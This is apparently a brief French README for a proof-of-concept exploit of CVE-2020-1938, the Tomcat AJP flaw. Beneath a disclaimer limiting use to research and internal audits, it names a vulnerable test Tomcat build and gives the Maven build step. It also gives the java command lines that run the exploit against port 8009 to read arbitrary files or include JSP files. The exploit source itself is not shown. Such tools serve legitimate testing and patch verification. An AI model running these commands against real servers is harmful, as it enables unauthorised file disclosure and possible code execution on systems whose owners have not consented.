
CVE-2020-1938
Cet outil est uniquement destiné à la recherche en sécurité et aux audits internes. Il est interdit de l'utiliser pour lancer des attaques illégales. L'utilisateur est responsable des conséquences.

apache-tomcat-8.5.32.zip (Tomcat de test)
Lecture arbitraire de fichiers
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp
Inclusion de fichiers (JSP)
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp
Méthode de construction : Dans le répertoire tomcat/ajp-bug Exécutez mvn clean compile assembly:assembly